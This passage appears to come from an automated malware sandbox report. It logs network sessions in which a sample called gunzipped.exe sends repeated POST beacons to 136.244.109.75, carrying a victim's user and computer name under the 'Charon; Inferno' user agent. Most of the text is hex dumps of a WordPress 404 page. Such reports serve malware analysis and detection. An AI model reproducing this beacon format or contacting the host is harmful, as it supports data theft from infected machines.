6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:40.071413040 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:40.071449995 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:40.071485043 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:40.071527004 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:40.071567059 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:40.071607113 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:40.071649075 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:40.071686029 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:40.071727991 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          71192.168.2.549785136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:40.424546003 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:40.628382921 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:41.577303886 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:40 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:41.577363968 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:41.577400923 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:41.577439070 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:41.577482939 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:41.577528000 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:41.577570915 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:41.577615023 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:41.577653885 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:41.577692032 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          72192.168.2.549786136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:41.923839092 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:42.127413034 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:43.027508974 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:42 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
